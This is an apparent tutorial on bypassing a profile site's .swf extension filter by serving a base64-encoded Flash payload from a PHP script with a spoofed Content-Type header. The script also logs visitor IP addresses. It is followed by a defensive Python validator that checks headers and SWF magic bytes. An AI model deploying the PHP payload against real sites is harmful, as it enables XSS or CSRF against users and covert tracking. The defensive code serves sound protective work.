Fooling the browser into doing things through content-type spoofing
Profile sites often let users include music or a video in their profile. Implemented carelessly, this is a security risk: even when all input is filtered and every special character in the output is encoded, we can still mount an XSS or CSRF attack with a Flash file.
The music or video is usually included in the profile with an <embed src="..."> tag. This tag is dangerous when it is used without the type attribute, which tells the browser what content type to expect from the target and therefore which handler to use for it.
The content type tells the browser how downloaded content should be handled. The site obviously does not want a Flash file embedded, so URLs ending in .swf are refused. That sounds secure, since we cannot include a Flash file any more. Or can we? We still can, because the site checks the file extension while the browser acts on the Content-Type response header: any URL whose response carries Content-Type: application/x-shockwave-flash is treated as Flash, whatever the URL looks like.
So if we host a PHP script on a server we control that sets that header and then sends the 'evil' Flash file, and embed the script's URL in the profile, the game is over.
Here is an example of such a script. It contains the Flash file base64-encoded, because the file consists of bytes that are not alphanumeric.
<?php
// a personal script, usage at own risk
// Tell the browser to treat the response as Flash, whatever the URL's
// extension says. header() must run before any output is sent.
header('Content-Type: application/x-shockwave-flash');
// The SWF file itself, base64-encoded because it contains non-printable bytes.
$EvilCode = "RldTCGwAAAAwCgCgAAwBAEQRAAAAAEMC////PwNHAAAAlg4AAHZhY2F0aW9uAAAzMAA8li0AAGh0dHA6Ly93d3cuYm9vdGxlZ2dlcnMudXMvcHJvZmlsZS5waHAAAF90b3AAmgEAAgBAAAAA";
echo base64_decode($EvilCode);
// Log the address of every visitor whose browser loaded the file.
$myFile = "l0g.tXt";
$fh = fopen($myFile, 'a');
fwrite($fh, "^_^ |" . $_SERVER['REMOTE_ADDR'] . "| ^_^\r\n");
fclose($fh);
?>
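The other side of the trick is how a site should check an embed target. The following Python is an added example, not code from the article or from any profile site: it compares the extension check the article defeats with a check on what the browser actually acts on, the response's Content-Type header and the leading bytes of the body. The sample responses are constructed, the hosts are placeholders, and the allowed media types are an assumed policy; the only real data is the first 12 base64 characters of the article's own payload, which decode to the SWF magic "FWS" followed by the version byte 8. The third case assumes a server that routes /evil.php/song.mp3 to evil.php (PATH_INFO), which defeats even an extension allowlist:

```python
import base64
import html
import os
from urllib.parse import urlsplit

# Constructed sample: the first 12 base64 characters of the SWF payload shown
# in the article. They decode to the SWF magic "FWS" (uncompressed Flash), the
# version byte 0x08 and the little-endian file length, so the bytes alone
# identify the format whatever the URL or the Content-Type header claims.
SAMPLE_SWF_PREFIX = base64.b64decode("RldTCGwAAAAw")   # b"FWS\x08l\x00\x00\x000"

# Magic bytes of the SWF container variants: uncompressed, zlib, LZMA.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")

# Assumed policy for this example: the profile may embed these media types only.
ALLOWED_TYPES = {"audio/mpeg", "audio/x-wav", "video/mpeg", "video/x-msvideo"}
FLASH_TYPES = {"application/x-shockwave-flash", "application/futuresplash"}


def extension_check(url: str) -> bool:
    """The weak check the article attacks: reject only URLs ending in .swf."""
    ext = os.path.splitext(urlsplit(url).path)[1].lower()
    return ext != ".swf"


def content_check(content_type: str, body_prefix: bytes) -> bool:
    """Decide on what the browser will act on: the fetched resource's
    Content-Type header and the first bytes of its body, never the file name.

    content_type: the raw Content-Type header of the fetched resource.
    body_prefix:  at least the first 3 bytes of the response body.
    """
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime in FLASH_TYPES:
        return False                   # the article's header trick
    if body_prefix[:3] in SWF_MAGICS:
        return False                   # header lies, but the bytes do not
    return mime in ALLOWED_TYPES


def render_embed(url: str, mime: str) -> str:
    """Emit the embed tag with an explicit type attribute, so the browser is
    told the handler instead of deferring to the remote server's Content-Type."""
    if mime not in ALLOWED_TYPES:
        raise ValueError(f"refusing to embed type {mime!r}")
    return f'<embed src="{html.escape(url, quote=True)}" type="{mime}">'


def review_profile_media(url: str, content_type: str, body_prefix: bytes) -> dict:
    """Run both checks on one (URL, response) pair so the gap is visible."""
    return {
        "by_extension": extension_check(url),
        "by_content": content_check(content_type, body_prefix),
    }


# Constructed responses, as a validator that fetched each URL itself would see
# them; no network is used and the hosts are placeholders.
CASES = [
    ("http://files.example/song.mp3", "audio/mpeg", b"ID3\x04\x00\x00"),
    # the article's attack: a .php URL whose response is a Flash file
    ("http://attacker.example/evil.php", "application/x-shockwave-flash", SAMPLE_SWF_PREFIX),
    # same script behind a PATH_INFO suffix, with the header spoofed as audio
    ("http://attacker.example/evil.php/song.mp3", "audio/mpeg", SAMPLE_SWF_PREFIX),
]

if __name__ == "__main__":
    for url, ctype, body in CASES:
        print(url, review_profile_media(url, ctype, body))
```

Running it shows the extension check passing both attacker URLs while the content check rejects them, once on the header and once on the magic bytes. A real validator has to fetch the URL itself to get those bytes, and should re-check periodically, since the attacker can change the response after the profile is approved.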
I hope you enjoyed my article and that I managed to make clear how this works (or maybe you already knew it ;)). Either way, please rate the article.